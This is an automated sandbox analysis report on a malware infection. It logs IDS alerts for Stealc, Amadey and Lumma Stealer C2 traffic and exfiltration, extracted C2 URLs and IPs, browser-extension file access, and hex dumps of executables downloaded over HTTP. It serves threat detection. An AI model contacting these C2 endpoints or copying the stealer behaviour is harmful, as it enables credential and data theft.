Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50062 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: nss3.pdb@ source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447177544.0000000000192000.00000040.00000001.01000000.0000000B.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000003.2314064013.0000000004E40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe

Directory queried: number of queries: 2130

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 93MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49797
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49915 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50003 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50002 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50038 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50049 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50050 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49736 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49945 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49916 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49927 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49927 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49985 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49985 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49994 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49994 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50020 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50033 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50033 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50035 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50035 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50062 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50052 -> 104.21.95.91:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:22 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:33 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 26 Oct 2024 03:44:58 GMTConnection: keep-aliveETag: "671c65ba-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 24 1c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 20 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 69 00 00 04 00 00 fa 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 68 65 62 78 79 7a 72 00 a0 19 00 00 70 4f 00 00 9c 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 7a 61 79 65 78 74 71 00 10 00 00 00 10 69 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 69 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:45 GMTContent-Type: application/octet-streamContent-Length: 2831360Last-Modified: Sat, 26 Oct 2024 03:26:14 GMTConnection: keep-aliveETag: "671c6156-2b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 41 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 6c 6b 6e 67 6d 71 6b 00 e0 2a 00 00 a0 00 00 00 d4 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6a 6d 6e 62 74 70 6e 00 20 00 00 00 80 2b 00 00 04 00 00 00 0e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 12 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 03:54:50 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 03:55:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 